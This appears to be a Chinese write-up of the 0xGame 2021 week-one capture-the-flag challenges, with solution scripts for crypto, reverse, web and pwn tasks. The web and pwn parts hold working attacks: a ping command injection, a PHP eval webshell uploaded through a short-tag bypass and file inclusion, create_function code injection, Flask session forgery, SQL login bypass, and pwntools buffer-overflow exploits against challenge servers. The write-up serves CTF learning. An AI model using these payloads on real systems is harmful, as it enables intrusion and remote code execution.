Oxgame2021week1

Oxgame2021week1

web

CuteCaesar

打开发现是嗷呜啊~组成的密文，百度发现是兽语加密，在线解密得到凯撒加密后的密文，发现偏移量为3，解出flag

manycode

打开发现是颜文字，颜文字在线解密，之后发现是base16，解码得到base64，继续解码base32得到flag

MyFunction

大概是解这样一个方程

x*log(x)=185.81764852357878

好像可以利用python的模块Sympy来解，但是会报错，所以直接暴力从可见ascill码(32-126)个字符

from math import log
c=[]
flag=[]
def f(x):
    return x*log(x)
'''
with open("output.txt","r") as f:
    while True:
        lines = f.readline() # 整行读取数据
        lines=lines.strip('\n')
        lines=lines.strip('\r')
        c.append(lines)
        if not lines:
          break
print(c)
'''
b=['185.81764852357878', '574.4990091338454', '302.6502712699334', '443.74696491482814', '511.3569191629766', '466.1271722009672', '591.8986757108073', '399.4886369061604', '522.7578523456691', '557.1743503713375', '307.919960569156', '205.46467336623422', '562.9407856869485', '466.1271722009672', '323.81160851522327', '517.0528402371658', '185.81764852357878', '568.715695680272', '466.1271722009672', '460.51701859880916', '350.5621307739105', '580.2906560172057', '220.40332518778592', '483.0166535107027', '522.7578523456691', '517.0528402371658', '329.13573386176114', '185.81764852357878', '225.41969468116838', '190.6991946074207', '545.6671947617738', '245.66067373332604', '580.2906560172057', '250.763305714572', '505.67017252941577', '517.0528402371658', '147.55517816455745', '574.4990091338454', '152.25645473487663', '255.88233187279567', '313.2035392038325', '517.0528402371658', '334.47301748273367', '205.46467336623422', '220.40332518778592', '483.0166535107027', '545.6671947617738', '603.5392171627877']
b = list(map(float, b))
for j in b:
    for i in range(32,128): 
        if f(i)==j:
            print(i)
            flag.append(chr(i))
print("".join(flag))

ABC Of RSA

RSA求逆元d

from Crypto.Util.number import *
p=9677
q=9241
e=10009
fn=(p-1)*(q-1)
d=inverse(e,fn)
flag="0xGame{%d}"%(d)
print(flag)

Class8

8种古典密码类型：盲文，跳舞小人，猪圈，手机键盘，摩斯密码，银河密码，培根密码，电脑键盘

0xgameweek1 - 图1

ezVigenère

在线解密

https://www.guballa.de/vigenere-solver

或者对应0xgame可以解出key为abc

BlackGiveRSA

n在线分解http://factordb.com

from Crypto.Util.number import *
# from secret import flag,p,q
p=1175078221
q=1435756429
c=[1150947306854980854,
243703926267532432,
1069319314811079682,
688582941857504686,
670683629344243145,
1195068175327355214]
assert q>p 
n=p*q
e=10007
# assert len(flag)==42
# for i in range(6):
#     m=bytes_to_long(flag[i*7:i*7+7])
#     print(pow(m,e,n))
print("Encryption using modulus n=",n)
"""
OutPut:
1150947306854980854
243703926267532432
1069319314811079682
688582941857504686
670683629344243145
1195068175327355214
Encryption using modulus n= 1687126110378632809
"""
fn=(p-1)*(q-1)
d=inverse(e,fn)
for i in c:
    flag=pow(i,d,n)
    print(bytes.fromhex(hex(flag)[2:]))
a='0xGame{ChuTiRenDeQQShiJiShangJiuShiQDeZhi}'
print(len(a))

web

爱ping才会赢

知识点：无过滤的ping命令执行system(‘’)

抓包

127.0.0.1；cat /flag

看看我的头

知识点：xff头、userangent伪造

import base64
import requests
payload={
    "X1cT34m":"1",
    "Pupi1":"1"
}
head={
    "User-Agent": "N1k0la浏览器".encode('utf-8'),
    "x-forwarded-for": "127.0.0.1"
}
url='http://159.75.116.195:700/?0xGame2021=welcome to the 0xGame2021'
r=requests.post(url=url,headers=head,data=payload)
print(r.text)
a='JGE9JF9HRVRbJzB4R2FtZTIwMjEnXTskYj0kX1BPU1RbJ1gxY1QzNG0nXTskZD0kX1BPU1RbJ1B1cGkxJ107JGM9J3dlbGNvbWUgdG8gdGhlIDB4R2FtZTIwMjEnO2lmKG1kNSgkYik9PW1kNSgkZCkmJiRhPT09JGMpe2VjaG8gJGZsYWc7fQ=='
a=base64.b64decode(a)
print(a)

你看看你能登录吗

知识点：爆破

抓包

发送到测试模式，狙击手模式，账号为admin，密码为四位，选择暴力，位数为4，线程50，爆破密码后成功登录

一个简单的文件上传

知识点：

php短标签https://www.jianshu.com/p/5ce7020467f2

<?=，它和 <? echo 等价，从 PHP 5.4.0 起， <?= 总是可用的

源码里面有注释：可以实现任意文件读取，实际上就是文件包含，可以用伪协议读源码

？filename=php://filter/read=convert.base64-encode/resource=index.php

读到两个文件，代码审计发现，上传会检测文件内容是否含有php，最后想到可以用短标签绕过，在结合文件包含可以getshell。

<div class="light"><span class="glow">
            <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                嘿伙计，传个火？！
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="upload"/>
            </form>
      </span><span class="flare"></span><div>
      <!--read.php?filename=  -->
<?php
    error_reporting(0);
    //设置上传目录
    define("UPLOAD_PATH", "./uplo4d");
    $msg = "Upload Success!";
    if (isset($_POST['submit'])) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_name = $_FILES['upload_file']['name'];
        $ext = pathinfo($file_name,PATHINFO_EXTENSION);
      if(preg_match("/ph/i", strtolower($ext))){
        die("这可不能上传啊！");
    }
            $content = file_get_contents($temp_file);
            if(preg_match("/php/i", $content)){
                die("诶，被我发现了吧");
            }
        $new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;
        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
    }
?>
<?php
highlight_file(__FILE__);
error_reporting(0);
$a=$_GET["filename"];
if(preg_match('/flag/i',$a)){
  exit("nononono");
}
include($a);
?>

上传一个txt文件<?@eval($_POST['a']);?>，然后用文件包含包含这个txt文件里面的内容就可以被当作代码执行了，

访问read.php?filename=./uplo4d/4717b086fb956e9f44326d55ebdae88d.txt，蚁剑连shell即可。

getshell之后输入 env可以看到flag在环境变量里面。

find_my_secret

知识点：create_function代码注入，hash_hmac函数缺陷

https://blog.51cto.com/lovexm/1743442

hash_hmac 传入数组会返回NULL， $secret_key就可以知道了

算hash的poc

<?php
error_reporting(0);
highlight_file(__FILE__);
$secret_key='123';
if(isset($_POST['N1k0la']))
    $secret_key = hash_hmac('sha256', $_POST['N1k0la'], $secret_key);
$payload = hash_hmac('sha256', $_POST['Pupi1'], $secret_key);
echo $payload;

payload：

Poria=1857d775657b27eb33cf2ee35da75f24e414f657e4df5c7190375acfc6a76a5a&Pupi1=return 0;}system('ls');///&N1k0la[]=1&action=%5Ccreate_function

一个简单的登录

知识点：flask session 伪造，session放客户端不安全

基本和下面这题一样：

https://www.cnblogs.com/zaqzzz/p/10243961.html

payload

python3 flask_session_cookie_manager3.py encode -s 'x1ct34myydsytstflglgjhdfhsh' -t '{"name":"admin","uid":"1"}'

之后带着cookie登录即可

Come to Inject me

知识点：万能密码

又是登录框，fuzz下过滤了单引号和空格

猜测后端语句为

select * from users where username='1\' and password='or 2>1'#'

payload

username=1\&password=or(2>1)#

Reverse

Packet

拖进peid发现加壳了是UPX壳，用UPX脱壳一下然后拖入IDA，进入IDA后按F5可以显示C语言代码
exp:
Our Compilation Story
先逆转一下，a字符串一位和后面三位的异或可以得到flag
exp:

enc=[145, 119, 251, 14, 183, 204, 228, 56, 17, 148, 253, 133, 92, 145, 132, 92,
125, 103, 39, 52, 53, 10, 216, 35, 13, 48, 101, 62, 19, 69, 84, 82, 81, 62,
176, 217, 19, 51, 195, 255]
check=[161, 15, 188, 111, 218, 169, 159, 94, 41, 246, 197, 228, 110, 242, 177,
56, 27, 1, 17, 0, 0, 50, 233, 65, 104, 2, 4, 6, 42, 112, 55, 107, 48, 93, 130,
232, 37, 87, 242, 130]
'''
#暴力破解方法
print(len(enc),len(check))
flag=[]
for i in range(len(check)):
for j in range(0,128):
if check[i] & ~j |j & ~check[i]==enc[i]:
flag.append(chr(j))
print("".join(flag))
print(flag)
print(len(flag))
'''
#异或
flag=""
for i in range(len(check)):
flag+=chr(enc[i]^check[i])
print(flag)

Random Chaos

a=[9, 0, 0, 0, 15, 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 0, 2, 0, 0, 0, 16, 0, 0, 0, 11, 0, 0, 0, 14, 0, 0, 0, 7, 0, 0, 0, 10, 0, 0, 0, 46, 0, 0, 0, 45, 0, 0, 0, 43, 0, 0, 0, 46, 0, 0, 0, 47, 0, 0, 0, 45, 0, 0, 0, 47, 0, 0, 0, 40, 0, 0, 0, 49, 0, 0, 0, 58, 0, 0, 0, 49, 0, 0, 0, 51, 0, 0, 0, 51, 0, 0, 0, 43, 0, 0, 0, 50, 0, 0, 0, 55, 0, 0, 0, 55, 0, 0, 0, 56, 0, 0, 0, 60, 0, 0, 0, 48, 0, 0, 0]
b=[206, 255, 255, 255, 147, 255, 255, 255, 216, 255, 255, 255, 242, 255, 255, 255, 223, 255, 255, 255, 112, 255, 255, 255, 114, 255, 255, 255, 208, 255, 255, 255, 166, 255, 255, 255, 154, 255, 255, 255]
flag=[]
c=[]
for i in range(len(b)):
    b[i]=str(bin(b[i]).lstrip('0b'))
t=0
for i in range(50):
    c.append(b[t+3]+b[t+2]+b[t+1]+b[t])
    t=t+4
    if t==40:
        break
for i in range(len(c)):
    c[i]='0b'+c[i]
    c[i]=int(c[i],2)   
# print(c)
for i in a:
    if i !=0:
        flag.append(i)
list1=flag+c
print(list1)

Neverland

from Crypto.Util.number import *
def Fib_general_formula(n):
    n=n+1
    return int(3*pow(4,n-1)+4*pow(-1,n-1))
idx=[9, 0xF,0xC,3,2,0x10,0xB,0xE,7,0xA,0x2E,0x2D,0x2B,0x2E,0x2F,0x2D, 0x2F,0x28,0x31,0x3A,0x31,0x33,0x33,0x2B,0x32,0x37,0x37,0x38, 0x3C, 0x30, 0xFFFFFFCE, 0xFFFFFF93,0xFFFFFFD8, 0xFFFFFFF2, 0xFFFFFFDF, 0xFFFFFF70, 0xFFFFFF72,0xFFFFFFD0,0xFFFFFFA6,0xFFFFFF9A]
enc=[0xBFFCC,0xBFFFFF84,0x3000043,0xDD,0x59, 0x61,0xBFFF87,0x30000035, 0xBF99, 0x300032, 0x36, 0xFFFFFFC9, 0xFFFFFF98,0x30,0xFFFFFF9F,0xFFFFFFCC,0xFFFFFFC8,0x62,0xFFFFFF99,0x30,0xFFFFFFC8,0xFFFFFF9A,0xFFFFFFC5,0xFFFFFF9E,0x32,0xFFFFFFC4,0xFFFFFFC8,0x60,0x3D,0x35,0x3D,0xFFFFFFCB,0x34,0x3C,0xFFFFFF9F, 0x65,0x65,0x33,0x66,0x79]
flag=[]
for i in range(len(idx)):
    flag.append(chr((Fib_general_formula(idx[i])^enc[i])%128))
    print(flag[i],end='')

pwn

nobackdoor

from pwn import *
p = remote('121.4.15.155',10001)
bin_sh_addr=0x0404040
system_addr=0x0401040
pop_rdi_addr=0x401223
payload = b"A"*0x58+ p64(pop_rdi_addr)+p64(bin_sh_addr)+ p64(system_addr)
p.sendline(payload)
p.interactive()

ret2text

from pwn import *
io = remote('121.4.15.155',10003)
success_addr = 0x401157
payload = b'a' * 88  + p64(success_addr)
io.sendline(payload)
io.interactive()